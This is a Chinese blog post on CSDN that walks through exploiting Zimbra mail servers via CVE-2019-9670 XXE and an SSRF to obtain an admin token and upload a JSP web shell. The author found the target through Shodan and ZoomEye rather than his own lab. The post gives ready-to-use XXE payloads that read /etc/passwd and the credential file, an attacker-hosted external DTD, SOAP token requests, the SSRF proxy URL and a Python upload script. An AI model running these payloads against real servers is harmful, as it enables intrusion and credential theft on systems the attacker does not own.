zimbra rce 漏洞复现

于 2019-05-12 03:46:37 发布 6281 收藏 2
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40709439/article/details/90136596
版权

本地搭建了好久,虚拟机突然蹦了,。。。
上钟馗之眼和shodan找了个目标

第一步,利用了CVE-2019-9670 XXE漏洞来读取配置文件

Zimbra配置文件位置为/conf/localconfig.xml

根据《A Saga of Code Executions on Zimbra》RCE漏洞分析

https://blog.csdn.net/fnmsd/article/details/88657083

Post :/Autodiscover/Autodiscover.xml
内容:

<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
 <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Request>
      <EMailAddress>aaaaa</EMailAddress>
      <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
    </Request>
  </Autodiscover>

在这里插入图片描述
成功读到用户密码,说明XXE验证成功

接下来构造payload读zimbra的配文件localconfig.xml

文章中说道:

由于localconfig.xml为XML文件,需要加上CDATA标签才能作为文本读取,由于XXE不能内部实体进行拼接,所以此处需要使用外部dtd:

dtd内容:

<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">

Post:/Autodiscover/Autodiscover.xml
内容:

<!DOCTYPE Autodiscover [
        <!ENTITY % dtd SYSTEM "http://公网服务器/dtd">
        %dtd;
        %all;
        ]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Request>
        <EMailAddress>aaaaa</EMailAddress>
        <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
    </Request>
</Autodiscover>

在这里插入图片描述
成功读到zimbra用户账号密码

第二步,利用得到的密码获取低权限的token

低权限token可通过soap接口发送AuthRequest进行获取:

Post: /service/soap
内容:

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
   <soap:Header>
       <context xmlns="urn:zimbra">
           <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
       </context>
   </soap:Header>
   <soap:Body>
     <AuthRequest xmlns="urn:zimbraAccount">
        <account by="adminName">zimbra</account>
        <password>上一步得到密码</password>
     </AuthRequest>
   </soap:Body>
</soap:Envelope>

在这里插入图片描述
拿到低权限token

第三步,利用ssrf漏洞获通过proxy接口,访问admin的soap接口获取高权限Token

Post: /service/proxy?target=https://127.0.0.1:7071/service/admin/soap

Ps:

  • Host:后面加端口7071

  • Cookie中设置Key为ZM_ADMIN_AUTH_TOKEN,值为上面请求所获取的token。

  • 发送同上Body内容,但是AuthRequest的xmlns要改为:urn:zimbraAdmin,否则获取的还是普通权限的Token

在这里插入图片描述
获得ADMIN_AUTH_TOKEN

第四步,利用高权限的token传文件getshell

用python脚本上传

import requests

file= {
'clientFile':("test.jsp",r'<%out.println("test");%>',"text/plain"), 'requestId':(None,"12",None),
}
headers ={ 
"Cookie":"ZM_ADMIN_AUTH_TOKEN=admin_token",#改成自己的admin_token
"Host":"foo:7071"
}
r=requests.post("https://xxxx/service/extension/clientUploader/upload",files=file,headers=headers,verify=False)    
print(r.text)

Shell路径
https://xxxx/downloads/test.jsp

访问shell得加上ADMIN_AUTH_TOKEN
这里我没有成功
还是得本地搭建啊,我用ubuntu14.0.4搭建
Zimbra的环境搭建比较麻烦,在此推荐篇有关zimbra搭建的优质博文
https://www.jianshu.com/p/722bc70ff426
在这里插入图片描述

莫者
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Zimbra 小于 8.8.11版本 XXE GetShell EXP.rar
05-08
Zimbra邮件系统<8.8.11 XXE SSRF远程代码执行漏洞GetShell 漏洞描述: 漏洞是利用XXE和ProxyServlet SSRF 漏洞拿到 admin authtoken 后,通过文件上传在服务端执行任意代码,威胁程度极高。当Zimbra服务端打来Memcached缓存服务是,可以利用SSRF攻击进行反序列化执行远程代码。不过由于Zimbra在单服务器安装中尽管Memcached虽然启动但是并没有进行使用,所以其攻击场景受到限制。 影响版本: ZimbraCollaboration Server 8.8.11 之前的版本都受到影响。具体来说: 1. Zimbra < 8.7.11 版本中,攻击者可以在无需登录的情况下,实现远程代码执行。 2. Zimbra < 8.8.11 版本中,在服务端使用 Memcached 做缓存的情况下,经过登录认证后的攻击者可以实现远程代码执行。
zimbra漏洞利用
kzyyx的博客
08-31 3429
记一次渗透测试zimbra漏洞利用 当时通过界面判断判断出开发利用zimbra搭建的网站。zimbra又存在多个漏洞。 1.首先通过利用了CVE-2019-9670 XXE漏洞来尝试读取/etc/passwd 读取文件成功,证明此漏洞可以被成功利用。 2.接下来读取zimbra的配置文件获取密码,因为配置文件时xml文件,因此需要使用外部dtd获取信息。 请求接口:Post:/Autodiscover/Autodiscover.xml Zimbra配置文件位置为/conf/localconfig.xml 在
网络安全状况月度报告-2019年3月
systemino的博客
04-25 541
一、网络安全状况概述 2019年3月,互联网网络安全状况整体指标平稳,但有几个特征值得关注。一方面,是勒索病毒依然猖獗,深信服安全云脑监测到Globelmposter、GandCrab、Crysis等病毒活跃热度居高不下,变种层出不穷,近期出现Globelmposter 4.0、GandCrab 5.2等勒索变种。用户一旦遭受勒索病毒攻击,绝大多数文件将被加密,且大多暂时无法解密,造成无法估量的...
Zimbra 远程代码执行漏洞(CVE-2019-9670)漏洞分析
最新发布
sxr__nc的博客
04-19 752
漏洞的主要利用手法是通过。符号没有进行处理,就会导致上述类型的攻击,攻击者在发送上述类型的数据包的时候可以新建一个。的内容,这样一来处理数据会很方便,但同时也会有巨大的安全隐患:如果把目标。获取,其实只需要将上边的数据包中的字段修改下即可直接获取到高权限的。,在解析的过程中遇到实体的引用会直接获取相应的内容,即这里碰到。函数的处理流程,在整体的处理过程中对于请求的数据包,只针对。两个字段进行的解析,在解析的过程中会判断获取到的邮箱地址和。免费、简单,已经获得了广泛的支持,方便大众的使用。
俄罗斯被指为 SolarWinds 供应链事件元凶,技术公司受制裁,常用5大漏洞遭曝光...
smellycat000的专栏
04-16 527
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码安全卫士今天,美国政府宣布对俄罗斯政府实施一系列制裁措施,正式将 SolarWinds Orion 供应链攻击归咎于俄罗斯联邦对外情报...
Zimbra CVE-2019-9670 XXE + CVE-2019-9621 SSRF 漏洞复现
部分学习记录
03-12 459
炒冷饭复现:cve-2019-9670 xxe + cve-2019-9621 ssrf
CVE-2022-27925 Zimbra任意文件上传漏洞复现
热爱学习,喜欢折腾!
10-26 1257
Zimbra提供一套开源协同办公套件包括WebMail,日历,通信录,Web文档管理和创作。它最大的特色在于其采用Ajax技术模仿CS桌面应用软件的风格开发的客户端兼容Firefox,Safari和IE浏览器。Zimbra Collaboration(又称ZCS)8.8.15和9.0具有mboximport功能,可接收ZIP存档并从中提取文件,具有管理员权限的认证用户可以将任意文件上传到系统中,从而导致目录遍历或远程代码执行。
CVE-2022-27925Zimbra Collaboration存在路径穿越漏洞最终导致RCE
include_voidmain的博客
07-07 1306
CVE-2022-27925Zimbra Collaboration存在路径穿越漏洞最终导致RCE
RCE漏洞
weixin_46962006的博客
12-13 6081
                       RCE(远程代码/命令执行)漏洞 目录前言简介 前言        个人观点,若有误请指教 简介 RCE(Remote Code/Command Execute)为远程代码/命令执行的漏洞 漏洞产生的原因:在Web应用中开发者为了灵活性,简洁性等会让应用去调用代码或者系统命令执行函数去处理。同时没有考虑用户是否可以控制这些函数的参数问题(若不能控制这些参数,自然也没有这个漏洞;若能控制这些参数,也可能出现考虑了但没有完全防住或者压根没考虑 ????),以至
邮箱部署zimbra
01-06
邮箱服务器部署
zmzcoreport:Zimbra ZCO 报告脚本
06-09
Zimbra ZCO 报告脚本概述根据 Zimbra 邮箱.log 文件报告当前使用的 Zimbra Connector for Outlook 版本。 此脚本将报告以空格分隔的登录日期、名称和地址、ZCO 版本、使用此版本的最近日期以及可以在日志文件中找到...
zimbra邮箱在线口令爆破脚本
02-23
利用python编写的脚本,用于zimbra邮箱服务器的用户口令在线爆破。
Zimbra Multi-Server Installation Guide
04-01
Zimbra Multi-Server Installation Guide
Zimbra工具
11-17
Zimbra是一家提供专业的电子邮件软件开发供应商
zimbra:安装和配置Zimbra Collaboration Open Source Edition的角色
01-31
在Red Hat,CentOS和Ubuntu Server上安装和配置Zimbra Collaboration Open Source Edition的非官方角色。 要求 2.9.6或更高。 安装 Zimbra已经在Ansible Galaxy中,因此只需在ansible-galaxy命令中在计算机中安装此...
Zimbra管理员手册
10-28
Zimbra管理员手册 用于您更好的使用Zimbra
Zimbra漏洞
公众号shadow sock7
08-19 1436
参考: https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html https://nvd.nist.gov/vuln/detail/CVE-2019-9670 https://nvd.nist.gov/vuln/detail/CVE-2016-9924 XXE CVE-2016-9924, CVE-2018-20...
《A Saga of Code Executions on ZimbraRCE漏洞分析+复现过程
热门推荐
fnmsd的博客
03-21 1万+
原文地址: https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html https://paper.tuisec.win/detail/8ac5a3d1efbf40b 下载Zimbra的包: 1.从地址https://www.zimbra.com/downloads/zimbra-collaboration-ope...
Zimbra SSRF+Memcached+反序列化漏洞利用复现
fnmsd的博客
04-12 7268
前言 之前懒了一下,没复现memcached反序列化的部分。 在看本文之前请先看完上一篇复现: https://blog.csdn.net/fnmsd/article/details/88657083 本篇复现基于8.7.11进行复现,就是官网上直接下的。 纯技术研究,请勿使用在非法用途。 环境搭建 直接用docker,https://hub.docker.com/r/jorgedlcruz/zi...
zimbra邮箱最大附件空间限制设置
02-07
Zimbra 邮箱中,可以通过以下方式设置邮件最大附件空间限制: 1. 登录 Zimbra 邮箱,进入管理员控制台。 2. 在左侧菜单栏中,点击 "配置" 。 3. 在 "配置" 页面中,找到 "系统" 选项卡。 4. 在 "系统" 选项卡下,找到 "邮件附件" 部分。 5. 在 "邮件附件" 部分中,找到 "邮件最大附件空间" 选项。 6. 在 "邮件最大附件空间" 选项下,输入你希望设置的邮件最大附件空间限制的值 (单位为 MB),然后点击 "保存" 按钮保存更改。 注意: 不同的 Zimbra 邮箱版本可能略有不同,你可能需要根据你使用的 Zimbra 邮箱版本来调整上述操作的具体步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

莫者

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值